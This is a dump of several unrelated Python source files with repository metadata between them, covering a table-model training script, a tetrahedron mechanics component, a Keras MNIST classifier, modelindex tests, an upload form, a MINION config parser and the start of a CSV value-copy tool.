parser.add_argument("--column_size", type=int, default=256, help="Max number of columns in table.")
parser.add_argument("--tree_depth", type=int, default=4, help="Maximum depth of top & left header tree.")
parser.add_argument("--node_degree", type=str, default="32,32,64,256", help="Maximum number of children of each tree node.")
parser.add_argument("--num_format_feature", type=int, default=11, help="Number of features of the format vector.")
parser.add_argument("--attention_distance", type=int, default=8, help="Maximum distance for attention visibility.")
parser.add_argument("--attention_step", type=int, default=0, help="Step size of attention distance to add for each layer.")
parser.add_argument("--num_attention_heads", type=int, default=12, help="Number of the attention heads.")
parser.add_argument("--num_encoder_layers", type=int, default=12, help="Number of the encoding layers.")
parser.add_argument("--num_tcr_type", type=int, default=2, help="Number of table-context classes.")
parser.add_argument("--hidden_dropout_prob", type=int, default=0.1, help="Dropout probability for hidden layers.")
parser.add_argument("--attention_dropout_prob", type=int, default=0.1, help="Dropout probability for attention.")
parser.add_argument("--layer_norm_eps", type=float, default=1e-6)
parser.add_argument("--hidden_act", type=str, default="gelu", help="Activation function for hidden layers.")
    # version options
parser.add_argument("--target", type=str, default="tuta", choices=["tuta", "tuta_explicit", "base"], help="Model variants.")
parser.add_argument("--attn_method", type=str, default="add", choices=["max", "add"])
# data size/processing options
parser.add_argument("--max_seq_len", type=int, default=256, help="Maximum length of the table sequence.")
parser.add_argument("--max_cell_num", type=int, default=256, help="Maximum cell number used in data loaders.")
parser.add_argument("--max_cell_length", type=int, default=64, help="Maximum number of tokens in one cell string.")
parser.add_argument("--max_disturb_num", type=int, default=20, help="Maximum number of cells to be disturbed per table.")
parser.add_argument("--disturb_prob", type=float, default=0.15, help="Probability to be disturbed per cell.")
parser.add_argument("--add_separate", type=bool, default=True, help="Whether to add [SEP] as aggregate cell representation.")
parser.add_argument("--text_threshold", type=float, default=0.5, help="Probability threshold to sample text in data region.")
parser.add_argument("--value_threshold", type=float, default=0.1, help="Prob to sample value in data region.")
parser.add_argument("--clc_rate", type=float, default=0.3)
parser.add_argument("--hier_or_flat", type=str, default="both", choices=["hier", "flat", "both"])
parser.add_argument("--wcm_rate", type=float, default=0.3, help="Proportion of masked cells doing whole-cell-masking.")
parser.add_argument("--clc_weight", type=float, default=1.0, help="Weight assigned to clc loss.")
# training options
parser.add_argument("--batch_size", type=int, default=12, help="Size of the input batch.")
parser.add_argument("--total_steps", type=int, default=1000000, help="Total training steps.")
parser.add_argument("--report_steps", type=int, default=100, help="Specific steps to print prompt.")
parser.add_argument("--save_checkpoint_steps", type=int, default=100000, help="Specific steps to save model checkpoint.")
parser.add_argument("--buffer_size", type=int, default=500000, help="The buffer size of instances in memory.")
    parser.add_argument("--chunk_size", type=int, default=50000, help="Minimum chunk size from a random data set.")
# io options
parser.add_argument("--dataset_paths", type=str, default='../dataset.pt', help="Paths of the preprocessed dataset.")
parser.add_argument("--pretrained_model_path", type=str, default=None, help="Path of the pretrained bert/ts model.")
parser.add_argument("--load_type", type=str, default="tuta", choices=["tuta", "bert", None])
parser.add_argument("--output_model_path", type=str, default="tuta.bin", help="Path of the output model.")
# optimizer options
parser.add_argument("--warmup", type=float, default=0.1, help="Warm up value.")
parser.add_argument("--learning_rate", type=float, default=2e-5, help="Initial learning rate.")
# gpu options
parser.add_argument("--world_size", type=int, default=1, help="Total number of processes (GPUs) for training.")
    parser.add_argument("--gpu_ranks", default=[], nargs='+', type=int, help="List of ranks of each process."
                        " Each process has a unique integer rank whose value is in the interval [0, world_size) and runs on a single GPU.")
parser.add_argument("--master_ip", default="tcp://localhost:12345", type=str, help="IP-Port of master for training.")
parser.add_argument("--backend", choices=["nccl", "gloo"], default="nccl", type=str, help="Distributed backend.")
args = parser.parse_args()
args.node_degree = [int(degree) for degree in args.node_degree.split(',')]
if args.target == "tuta_explicit":
args.node_degree = [32, 32, 64, 160]
print("node degree: ", args.node_degree)
# convert '+'-connected dataset_paths into list of strings
args.dataset_paths = args.dataset_paths.split('+')
ranks_num = len(args.gpu_ranks)
if args.world_size > 1:
assert torch.cuda.is_available(), "No available GPUs."
        assert ranks_num <= args.world_size, "Started processes exceed the `world_size` upper limit."
        assert ranks_num <= torch.cuda.device_count(), "Started processes exceed the number of available GPUs."
# multiple GPU mode
args.dist_train = True
args.ranks_num = ranks_num
args.device_count = torch.cuda.device_count()
print("Using distributed mode for training.")
elif args.world_size == 1 and ranks_num == 1:
assert torch.cuda.is_available(), "No available GPUs."
# single GPU mode.
args.gpu_id = args.gpu_ranks[0]
        assert args.gpu_id < torch.cuda.device_count(), "Invalid GPU device specified."
args.dist_train = False
args.single_gpu = True
print("Using single GPU: {} for training.".format(args.gpu_id))
else:
# CPU mode.
assert ranks_num == 0, "GPUs are specified, please check the arguments."
args.dist_train = False
args.single_gpu = False
print("Using CPU mode for training.")
train_and_validate(args)
if __name__ == "__main__":
main()
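# Illustrative invocations (paths, ranks and targets below are made up):
#   CPU        : python train.py --target base
#   single GPU : python train.py --target tuta --world_size 1 --gpu_ranks 0
#   distributed: python train.py --target tuta --world_size 4 --gpu_ranks 0 1 2 3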
| 55 | 143 | 0.687007 |
d18c08465c1f32bc5c25cd258c304646ee1f9efc
| 2,118 |
py
|
Python
|
resources/mechanics_lib/Tetrahedron.py
|
PRECISE/ROSLab
|
2a6a295b71d4c73bc5c6ae2ec0330274afa31d0d
|
[
"Apache-2.0"
] | 7 |
2016-01-20T02:33:00.000Z
|
2021-02-04T04:06:57.000Z
|
resources/mechanics_lib/Tetrahedron.py
|
PRECISE/ROSLab
|
2a6a295b71d4c73bc5c6ae2ec0330274afa31d0d
|
[
"Apache-2.0"
] | null | null | null |
resources/mechanics_lib/Tetrahedron.py
|
PRECISE/ROSLab
|
2a6a295b71d4c73bc5c6ae2ec0330274afa31d0d
|
[
"Apache-2.0"
] | 3 |
2016-10-05T07:20:30.000Z
|
2017-11-20T10:36:50.000Z
|
from api.component import Component
from connector import Tab
from api.shapes import Face
from api.edge import *
class Tetrahedron(Component):
def defParameters(self):
self.newParameter("perimeter")
self.newParameter("start", 0)
self.newParameter("end", 1)
self.newParameter("min", 1)
def defInterfaces(self):
self.newInterface("endedge")
self.newInterface("startedge")
def assemble(self):
    # an equilateral triangular face of side `fullwidth` has height fullwidth*sqrt(3)/2
fullwidth = self.getParameter("perimeter")/4.
fullheight = fullwidth*(3**.5)/2.
h = fullheight * abs(self.getParameter("end") - self.getParameter("start"))
def splits(width, frac):
return [width * x for x in (frac/2., 1-frac, 1+frac, 1-frac, 1+frac/2.)]
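    # note: frac/2 + (1-frac) + (1+frac) + (1-frac) + (1+frac/2) == 4, so the
    # five offsets always sum to 4*width == perimeter; e.g. splits(w, 0) == [0, w, w, w, w]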
se = splits(fullwidth, self.getParameter("end"))
ss = splits(fullwidth, self.getParameter("start"))
m = min(self.getParameter("start"),
self.getParameter("end"),
self.getParameter("min")) * fullwidth / 2.
se[0] -= m
ss[0] -= m
se[-1] += m
ss[-1] += m
xb, xt, index = 0, 0, 0
for (xstart, xend) in zip(ss, se):
r = Face(((xb, 0), (xb+xstart, 0), (xt+xend, h), (xt, h)), origin=False)
if index:
self.drawing.attach("r%d.e2" % (index-1), r, "e0", "r%d" % index, Fold(109.5))
else:
self.drawing.append(r, "r%d" % index)
xb += xstart
xt += xend
index += 1
self.addConnectors((Tab(), "t1"), "r0.e0", "r4.e2", min(10, fullwidth / 2.), (Flat(), Cut()))
self.setInterface("startedge", ["r%d.e1" % x for x in range(5)])
self.setInterface("endedge", ["r%d.e3" % x for x in range(5)])
if __name__ == "__main__":
h = Tetrahedron()
h.setParameter("perimeter", 400)
h.setParameter("start", 1)
h.setParameter("end", 0)
h.make()
h.drawing.transform(relative = (0,0))
h.drawing.graph.toSTL("output/tetra.stl")
import utils.display
utils.display.displayTkinter(h.drawing)
| 32.584615 | 100 | 0.571766 |
c9c501e8a1f1ae12d26ca5df3e416c69e2ceb6a1
| 3,621 |
py
|
Python
|
chapter5/mnistcnn.py
|
yangzhijiang/GeektimeTensorflow
|
80479426a216d1d27fc78e53c581008ccec46cbe
|
[
"MIT"
] | 1 |
2020-02-16T13:31:42.000Z
|
2020-02-16T13:31:42.000Z
|
chapter5/mnistcnn.py
|
yangzhijiang/GeektimeTensorflow
|
80479426a216d1d27fc78e53c581008ccec46cbe
|
[
"MIT"
] | null | null | null |
chapter5/mnistcnn.py
|
yangzhijiang/GeektimeTensorflow
|
80479426a216d1d27fc78e53c581008ccec46cbe
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# @Time : 2019/2/16 19:24
# @Author : LunaFire
# @Email : [email protected]
# @File : mnistcnn.py
import os
import matplotlib.pyplot as plt
from keras import backend as K
from keras.datasets import mnist
from keras.utils import np_utils
from keras.models import Sequential, load_model
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPool2D
from tensorflow import gfile
if __name__ == '__main__':
(X_train, Y_train), (X_test, Y_test) = mnist.load_data()
print(X_train.shape, Y_train.shape)
print(X_test.shape, Y_test.shape)
    # reshape data to the backend's expected image format
img_rows, img_cols = 28, 28
if K.image_data_format() == 'channels_first':
X_train = X_train.reshape(X_train.shape[0], 1, img_rows, img_cols)
X_test = X_test.reshape(X_test.shape[0], 1, img_rows, img_cols)
input_shape = (1, img_rows, img_cols)
else:
X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, 1)
X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, 1)
input_shape = (img_rows, img_cols, 1)
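    # e.g. with channels_last, X_train goes from (60000, 28, 28) to
    # (60000, 28, 28, 1) and input_shape becomes (28, 28, 1)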
print(X_train.shape, Y_train.shape)
print(X_test.shape, Y_test.shape)
    # scale pixel values to [0, 1]
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255
X_test /= 255
print(X_train.shape[0], 'Train Samples')
print(X_test.shape[0], 'Test Samples')
    # one-hot encode the labels
n_classes = 10
print('Shape Before One-Hot Encoding:', Y_train.shape)
Y_train = np_utils.to_categorical(Y_train, n_classes)
print('Shape After One-Hot Encoding:', Y_train.shape)
Y_test = np_utils.to_categorical(Y_test, n_classes)
    # define the network architecture
model = Sequential()
model.add(Conv2D(filters=32, kernel_size=(3, 3), activation='relu', input_shape=input_shape))
model.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu'))
model.add(MaxPool2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(120, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(n_classes, activation='softmax'))
print(model.summary())
for layer in model.layers:
print(layer.get_output_at(0).get_shape().as_list())
    # compile the model
model.compile(loss='categorical_crossentropy', metrics=['accuracy'], optimizer='adam')
    # train the model
history = model.fit(
X_train,
Y_train,
batch_size=32,
epochs=5,
verbose=2,
validation_data=(X_test, Y_test),
)
    # visualize the training history
fig = plt.figure()
plt.subplot(2, 1, 1)
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('Model Accuracy')
plt.ylabel('Accuracy')
plt.xlabel('Epoch')
plt.legend(['train', 'test'], loc='lower right')
plt.subplot(2, 1, 2)
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('Model Loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend(['train', 'test'], loc='lower right')
plt.tight_layout()
plt.show()
    # save the model
save_dir = '../model/mnist/'
if gfile.Exists(save_dir):
gfile.DeleteRecursively(save_dir)
gfile.MakeDirs(save_dir)
model_name = 'keras_mnist.h5'
model_path = os.path.join(save_dir, model_name)
model.save(model_path)
print('Saved Trained Model At %s ' % model_path)
    # load the model back
model = load_model(model_path)
    # evaluate the model on the test set
loss_and_metrics = model.evaluate(X_test, Y_test, verbose=2)
print('Test Loss: {}'.format(loss_and_metrics[0]))
print('Test Accuracy: {}%'.format(loss_and_metrics[1] * 100))
| 30.686441 | 97 | 0.65921 |
4e625971225c80acdf439a7a8e8b15dc1f6e8b39
| 2,338 |
py
|
Python
|
tests/test_collections.py
|
datumbox/model-index
|
a39af5f8aaa2a90b8fc7180744a855282360067a
|
[
"MIT"
] | 12 |
2021-02-26T08:19:00.000Z
|
2022-01-26T14:00:16.000Z
|
tests/test_collections.py
|
datumbox/model-index
|
a39af5f8aaa2a90b8fc7180744a855282360067a
|
[
"MIT"
] | null | null | null |
tests/test_collections.py
|
datumbox/model-index
|
a39af5f8aaa2a90b8fc7180744a855282360067a
|
[
"MIT"
] | 3 |
2021-03-19T13:51:56.000Z
|
2021-08-25T05:25:52.000Z
|
import modelindex
import pytest
from modelindex import Metadata
from modelindex.models.Collection import Collection
from modelindex.models.CollectionList import CollectionList
from modelindex.models.Model import Model
from modelindex.models.ModelList import ModelList
from modelindex.models.Result import Result
from modelindex.models.ResultList import ResultList
from modelindex.models.ModelIndex import ModelIndex
import copy
def test_deepcopy():
mi = modelindex.load("tests/test-mi/03_col")
m1 = mi.models[0]
m2 = copy.deepcopy(m1)
m2.name = "New name"
assert m1.name != m2.name
assert m2.name == "New name"
m2.results[0].task = "New task"
assert m1.results[0].task != m2.results[0].task
assert m2.results[0].task == "New task"
m2.results.data.append(Result(task="", dataset="", metrics={}))
assert len(m1.results) == 1
assert len(m2.results) == 2
m2.metadata.flops = 10
assert m1.metadata.flops != m2.metadata.flops
assert m2.metadata.flops == 10
def test_col_merge():
mi = modelindex.load("tests/test-mi/17_collections_merge")
m1 = mi.models[0].full_model
m2 = mi.models[1].full_model
assert m1.metadata.training_data == "ImageNet"
assert m2.metadata.training_data == "Reddit"
assert len(m1.metadata.training_techniques) == 4
assert len(m2.metadata.training_techniques) == 5
assert m2.metadata.training_techniques[-1] == "Transformers"
assert m1.readme == "docs/inception-v3-readme.md"
assert m2.readme == "docs/inception-v3-readme-120.md"
mi = modelindex.load("tests/test-mi/17_collections_merge/mi2.yml")
m1 = mi.models[0].full_model
m2 = mi.models[1].full_model
assert len(m1.results) == 2
assert len(m2.results) == 2
assert m1.results[0].metrics["Top 1 Accuracy"] == "11%"
assert m2.results[0].metrics["Top 1 Accuracy"] == "11%"
assert m1.results[1].metrics["Top 1 Accuracy"] == "74.67%"
assert m2.results[1].metrics["Top 1 Accuracy"] == "75.1%"
mi = modelindex.load("tests/test-mi/17_collections_merge/mi3.yml")
err = mi.check(silent=True)
assert len(err) == 2
assert "Inception v3-1" in err[0]
m1 = mi.models[0].full_model
m2 = mi.models[1].full_model
assert m1.metadata.training_data is None
assert m2.metadata.training_data == "Reddit"
| 30.363636 | 70 | 0.696322 |
0118bbd621593dfd2ab53101f08164527bfdaec9
| 1,740 |
py
|
Python
|
src/onegov/election_day/forms/upload/wabsti_majorz.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/election_day/forms/upload/wabsti_majorz.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/election_day/forms/upload/wabsti_majorz.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.election_day.forms.upload.common import ALLOWED_MIME_TYPES
from onegov.election_day.forms.upload.common import MAX_FILE_SIZE
from onegov.form import Form
from onegov.form.fields import UploadField
from onegov.form.validators import FileSizeLimit
from onegov.form.validators import WhitelistedMimeType
from wtforms.validators import DataRequired
class UploadWabstiMajorzElectionForm(Form):
wm_gemeinden = UploadField(
label="WM_Gemeinden",
validators=[
DataRequired(),
WhitelistedMimeType(ALLOWED_MIME_TYPES),
FileSizeLimit(MAX_FILE_SIZE)
],
render_kw=dict(force_simple=True)
)
wm_kandidaten = UploadField(
label="WM_Kandidaten",
validators=[
DataRequired(),
WhitelistedMimeType(ALLOWED_MIME_TYPES),
FileSizeLimit(MAX_FILE_SIZE)
],
render_kw=dict(force_simple=True)
)
wm_kandidatengde = UploadField(
label="WM_KandidatenGde",
validators=[
DataRequired(),
WhitelistedMimeType(ALLOWED_MIME_TYPES),
FileSizeLimit(MAX_FILE_SIZE)
],
render_kw=dict(force_simple=True)
)
wm_wahl = UploadField(
label="WM_Wahl",
validators=[
DataRequired(),
WhitelistedMimeType(ALLOWED_MIME_TYPES),
FileSizeLimit(MAX_FILE_SIZE)
],
render_kw=dict(force_simple=True)
)
wmstatic_gemeinden = UploadField(
label="WMStatic_Gemeinden",
validators=[
DataRequired(),
WhitelistedMimeType(ALLOWED_MIME_TYPES),
FileSizeLimit(MAX_FILE_SIZE)
],
render_kw=dict(force_simple=True)
)
| 28.52459 | 70 | 0.651724 |
61f6d2a5f05b2d6ba499dd31b52ea17416beb70c
| 12,746 |
py
|
Python
|
wz/minion.py
|
gradgrind/WZ
|
672d93a3c9d7806194d16d6d5b9175e4046bd068
|
[
"Apache-2.0"
] | null | null | null |
wz/minion.py
|
gradgrind/WZ
|
672d93a3c9d7806194d16d6d5b9175e4046bd068
|
[
"Apache-2.0"
] | null | null | null |
wz/minion.py
|
gradgrind/WZ
|
672d93a3c9d7806194d16d6d5b9175e4046bd068
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
minion.py - last updated 2021-05-27
Read MINION-formatted configuration data.
==============================
Copyright 2021 Michael Towers
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
"""
MINION: MINImal Object Notation
-------------------------------
MINION is a simple configuration-file format taking ideas from JSON.
It contains structured data based on "dicts" (associative arrays), lists
and strings. Nothing else is supported. Files should be encoded as utf-8.
simple-string: A character sequence containing none of the following
control characters:
' ': A separator.
'#': Start a comment (until the end of the line).
':': Separates key from value in a dict.
'{': Start a dict.
'}': End a dict.
'[': Start a list.
']': End a list.
'<<<': Start a complex-string.
'>>>': End a complex-string.
dict: { key:value key:value ... }
A "key" is a simple-string.
A "value" may be a simple-string, a complex-string, a list or a dict.
list: [ value value ... ]
A "value" may be a simple-string, a complex-string, a list or a dict.
complex-string: <<< any characters ... >>>
A complex-string may be continued from one line to the next. In that
case the next line must (also) be prefixed by '<<<'. Empty and
comment lines will be ignored. Line breaks within a string are not
directly supported – but provision is made for specifying escape
characters: the basic escape sequences are '\\', '\n' and '\t'
(for backslash, newline and tab). Spaces at the end of a line are
ignored. In addition, for the sake of "completeness", there are
'\s' (space character), which makes a space character at end of a
line possible, and '\g' for '>', which makes '>' just before the
closing '>>>' possible.
Spaces are not needed around the control characters, but they may
be used. Apart from within complex-strings and their use as separators,
spaces will be ignored.
The top level of a MINION text is a "dict" – without the surrounding
braces ({ ... }).
There is also a very limited macro-like feature. Elements declared at the
top level which start with '&' may be referenced (which basically means
included) at any later point in a data structure by means of the macro
name, e.g.:
&MACRO1: [A list of words]
...
DEF1: { X: &MACRO1 }
There is a predefined macro for the empty string, '&', equivalent to the
following declaration (except that the key '&' doesn't appear in the
resulting mapping):
&: <<<>>>
"""
### Messages
_BAD_DICT_LINE = "Ungültige Zeile (Schlüssel: Wert):\n {line} – {text}"
_MULTI_KEY = "Schlüssel mehrfach definiert:\n {line} – {key}"
_BAD_DICT_VALUE = "Ungültiger Schlüssel-Wert:\n {line} – {val}"
_BAD_LIST_VALUE = "Ungültiger Listeneintrag:\n {line} – {val}"
_BAD_STRINGX = "Ungültige Text-Zeile:\n {line} – {text}"
_NO_KEY = "Schlüssel erwartet:\n {line} – {text}"
_EARLY_END = "Vorzeitiges Ende der Eingabe in Zeile {line}:\n {text}"
_NESTING_ERROR = "Datenstruktur nicht ordentlich abgeschlossen"
_NO_FILE = "MINION-Datei nicht gefunden:\n {path}"
_BAD_FILE = "Ungültiges Datei-Format:\n {path}"
_BAD_GZ_FILE = "Ungültiges Datei-Format (nicht 'gzip'):\n {path}"
_FILEPATH = "\n [in {path}]"
_BAD_MACRO = "Unbekanntes „Makro“: {line} – {val}"
### Special symbols, etc.
_COMMENT = '#'
_MACRO = '&'
_KEYSEP = ':'
_LIST0 = '['
_LIST1 = ']'
_DICT0 = '{'
_DICT1 = '}'
_DICTK = ':'
_STRING0 = '<<<'
_lenSTRING0 = len(_STRING0)
_STRING1 = '>>>'
_REGEX = r'(\s+|#|:|\[|\]|\{|\}|<<<|>>>)' # all special items
ESCAPE_DICT = {r'\n': '\n', r'\\': '\\', r'\t': '\t', r'\s': ' ', r'\g': '>'}
import re, gzip
_RXSUB ='|'.join([re.escape(e) for e in ESCAPE_DICT])
MACRO_BUILTINS = {
_MACRO: ''
}
class MinionError(Exception):
pass
###
class Minion:
"""An impure recursive-descent parser for a MINION string.
Usage:
minion = Minion()
python_dict = minion.parse(text)
"""
#
def report(self, message, **params):
msg = message.format(**params)
path = params.get('path')
if (not path) and self.filepath:
msg += _FILEPATH.format(path = self.filepath)
raise MinionError(msg)
#
def parse(self, text, filepath = None):
self.toplevel = None # Needed for macros
self.filepath = filepath
self.line_number = 0
self.lines = text.splitlines()
data, rest = self.DICT(None)
if rest or self.line_number < len(self.lines):
self.report(_EARLY_END, line = self.line_number,
text = self.lines[self.line_number - 1])
return data
#
def parse_file(self, fpath, **replacements):
try:
with open(fpath, 'r', encoding = 'utf-8') as fh:
text = fh.read()
except FileNotFoundError:
self.report(_NO_FILE, path = fpath)
except ValueError:
self.report(_BAD_FILE, path = fpath)
return self.parse_replace(text, fpath, **replacements)
#
def parse_replace(self, text, fpath, **params):
for rep, val in params.items():
text = text.replace(rep, val)
return self.parse(text, fpath)
#
def parse_file_gz(self, fpath, **replacements):
try:
with gzip.open(fpath, 'rt', encoding='UTF-8') as zipfile:
text = zipfile.read()
except FileNotFoundError:
self.report(_NO_FILE, path = fpath)
except OSError:
self.report(_BAD_GZ_FILE, path = fpath)
return self.parse_replace(text, fpath, **replacements)
#
def read_line(self):
if self.line_number >= len(self.lines):
if self.line_number == len(self.lines):
# No more lines
self.line_number += 1
return _DICT1
self.report(_NESTING_ERROR)
line = self.lines[self.line_number]
self.line_number += 1
return line.strip()
#
def read_symbol(self, line):
"""Read up to the next "break-item" (space or special character
or character sequence) on the current line.
Return a triple: (pre-break-item, break-item, remainder)
If there is no break-item or it is a comment, return
(pre-break-item, None, None).
"""
try:
line = line.replace('\t', ' ').strip()
sym, sep, rest = re.split(_REGEX, line, 1)
except:
return line, None, None
if sep == '#':
# Comment
return sym, None, None
if sep[0] == ' ':
if rest.startswith('#'):
# Comment
return sym, None, None
# If there is a space as break-item, use <None>.
sep = None
return sym, sep, rest
#
def DICT(self, line):
dmap = {}
if self.toplevel == None:
self.toplevel = dmap # Needed for macros
while True:
key, sep, rest = self.read_symbol(line)
if sep == _DICTK:
if not key:
self.report(_NO_KEY, line = self.line_number, text = line)
if key in dmap:
self.report(_MULTI_KEY, line = self.line_number, key = key)
elif sep == _DICT1 and not key:
# End of DICT
return dmap, rest
else:
if key or sep or rest:
self.report(_BAD_DICT_LINE, line = self.line_number,
text = line)
line = self.read_line()
continue
while not rest:
rest = self.read_line()
val, sep, rest2 = self.read_symbol(rest)
if val:
# A simple-string value ... or a macro
if val[0] == _MACRO:
try:
dmap[key] = self.toplevel[val]
except KeyError:
try:
dmap[key] = MACRO_BUILTINS[val]
except KeyError:
self.report(_BAD_MACRO, line = self.line_number,
val = val)
else:
dmap[key] = val
if sep == _DICT1:
return dmap, rest2
elif sep:
self.report(_BAD_DICT_LINE, line = self.line_number,
text = line)
elif sep == _STRING0:
# A complex-string value
dmap[key], rest2 = self.STRING(rest2)
elif sep == _DICT0:
# A sub-item (DICT or LIST)
dmap[key], rest2 = self.DICT(rest2)
elif sep == _LIST0:
dmap[key], rest2 = self.LIST(rest2)
else:
self.report(_BAD_DICT_VALUE, line = self.line_number,
val = rest)
line = rest2
#
def STRING(self, line):
lx = []
while True:
try:
line, rest = line.split(_STRING1, 1)
lx.append(line)
s0 = ''.join(lx)
s0 = re.sub(_RXSUB,
lambda m: ESCAPE_DICT[m.group(0)],
s0)
return s0, rest.lstrip()
except ValueError:
# no end, continue to next line
lx.append(line)
while True:
# Empty lines and comment-lines are ignored
line = self.read_line()
if (not line) or line.startswith(_COMMENT):
continue
try:
l1, l2 = line.split(_STRING0, 1)
if not l1:
line = l2
break
except ValueError:
pass
self.report(_BAD_STRINGX, line = self.line_number, text = line)
#
def LIST(self, line):
lx = []
while True:
while not line:
line = self.read_line()
sym, sep, rest = self.read_symbol(line)
if sym:
# A simple-string value ... or a macro
if sym[0] == _MACRO:
try:
lx.append(self.toplevel[sym])
except KeyError:
try:
lx.append(MACRO_BUILTINS[sym])
except KeyError:
self.report(_BAD_MACRO, line = self.line_number,
val = sym)
else:
lx.append(sym)
if not sep:
line = rest
continue
if sep == _LIST1:
# End of list
return lx, rest
elif sep == _STRING0:
# A complex-string value
sym, rest = self.STRING(rest)
elif sep == _DICT0:
# A DICT sub-item
sym, rest = self.DICT(rest)
elif sep == _LIST0:
# A LIST sub-item
sym, rest = self.LIST(rest)
else:
self.report(_BAD_LIST_VALUE, line = self.line_number,
val = rest)
lx.append(sym)
line = rest
#--#--#--#--#--#--#--#--#--#--#--#--#--#--#--#--#--#--#--#--#--#--#--#
if __name__ == '__main__':
minion = Minion()
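    # Minimal inline demonstration of the syntax described in the module
    # docstring; SAMPLE and its keys are made-up illustration data.
    SAMPLE = ("&GRADES: [1 2 3 4 5]\n"
              "TITLE: <<<A demo config>>>  # a complex-string\n"
              "RULES: { scale: &GRADES empty: & }\n")
    demo = minion.parse(SAMPLE)
    print("inline demo:", demo["RULES"]["scale"])  # -> ['1', '2', '3', '4', '5']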
data = minion.parse_file('_test/data/test1.minion',
_ABITUR_GRADES = "[15 14 13 12 11 10 09 08 07"
" 06 05 04 03 02 01 00 * n t nb /]")
for k, v in data.items():
if k[0] == _MACRO:
continue
print("\n *** SECTION %s ***" % k)
for k1, v1 in v.items():
print(" ... %s: %s" % (k1, v1))
print("TOPLEVEL:", minion.toplevel)
print("\n ++ Test gzipped file ++")
data = minion.parse_file_gz('_test/data/test2.minion.gz')
print("\n???", data)
quit(0)
for k, v in data.items():
print("\n *** SECTION %s ***" % k)
for k1, v1 in v.items():
print(" ... %s: %s" % (k1, v1))
| 35.904225 | 79 | 0.528323 |
fecb5c82863b05d04a7c6dd0172f1773db28b2f0
| 7,586 |
py
|
Python
|
python/csv_value_copy.py
|
sma-h/openapc-de
|
0ec2d42d525219d801f71538f5b30ca6fecd9d3a
|
[
"Cube"
] | 89 |
2015-02-13T13:46:06.000Z
|
2022-03-13T16:42:44.000Z
|
python/csv_value_copy.py
|
sma-h/openapc-de
|
0ec2d42d525219d801f71538f5b30ca6fecd9d3a
|
[
"Cube"
] | 91 |
2015-03-12T13:31:36.000Z
|
2022-01-14T07:37:37.000Z
|
python/csv_value_copy.py
|
sma-h/openapc-de
|
0ec2d42d525219d801f71538f5b30ca6fecd9d3a
|
[
"Cube"
] | 138 |
2015-03-04T15:23:43.000Z
|
2022-03-09T15:11:52.000Z
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import argparse
import codecs
import csv
import sys
import openapc_toolkit as oat
ARG_HELP_STRINGS = {
"source_file": "The source csv file",
"source_file_key_column": "The numerical index of the key column " +
"in the source file",
"source_file_value_column": "The numerical index of the value column " +
"in the source file",
"target_file": "The csv file to enrich with values",
"target_file_key_column": "The numerical index of the key column " +
"in the target file",
"target_file_value_column": "The numerical index of the value column " +
"in the target file",
"strict": "keys with ambiguous values will be dropped from the " +
"mapping table (without this, the last encountered value will be used)",
"force_overwrite": "Replace existing values (otherwise only " +
"empty and NA fields will be replaced)",
"encoding": "The encoding of the CSV file. Setting this argument will " +
"disable automatic guessing of encoding.",
"other_encoding": "The optional encoding of the source CSV file.",
"quotemask": "A quotemask to apply to the result file after the action " +
"has been performed. A quotemask is a string consisting " +
"only of the letters 't' and 'f' (true/false) and has " +
"the same length as there are columns in the (resulting) " +
"csv file. Only the columns where the index is 't' will be " +
"quoted.",
"openapc_quote_rules": "Determines if the special openapc quote rules " +
"should be applied, meaning that the keywords " +
"NA, TRUE and FALSE will never be quoted. If in " +
"conflict with a quotemask, openapc_quote_rules " +
"will take precedence."
}
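# Illustrative invocation (file names and column indices are made up):
#   python csv_value_copy.py issn_map.csv 0 2 apc_de.csv 3 4 --force_overwrite
# With four result columns, a quotemask of "tfft" would quote only the first
# and the last column.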
def main():
parser = argparse.ArgumentParser()
parser.add_argument("source_file", help=ARG_HELP_STRINGS["source_file"])
parser.add_argument("source_file_key_column", type=int, help=ARG_HELP_STRINGS["source_file_key_column"])
parser.add_argument("source_file_value_column", type=int, help=ARG_HELP_STRINGS["source_file_value_column"])
parser.add_argument("target_file", help=ARG_HELP_STRINGS["target_file"])
parser.add_argument("target_file_key_column", type=int, help=ARG_HELP_STRINGS["target_file_key_column"])
parser.add_argument("target_file_value_column", type=int, help=ARG_HELP_STRINGS["target_file_value_column"])
parser.add_argument("-s", "--strict", action="store_true", help=ARG_HELP_STRINGS["strict"])
parser.add_argument("-f", "--force_overwrite", action="store_true", help=ARG_HELP_STRINGS["force_overwrite"])
parser.add_argument("-e", "--encoding", help=ARG_HELP_STRINGS["encoding"])
parser.add_argument("-e2", "--other_encoding", help=ARG_HELP_STRINGS["other_encoding"])
parser.add_argument("-q", "--quotemask", help=ARG_HELP_STRINGS["quotemask"])
parser.add_argument("-o", "--openapc_quote_rules",
help=ARG_HELP_STRINGS["openapc_quote_rules"],
action="store_true", default=False)
args = parser.parse_args()
quote_rules = args.openapc_quote_rules
    encs = [] # CSV file encodings
for encoding in [args.encoding, args.other_encoding]:
if encoding:
try:
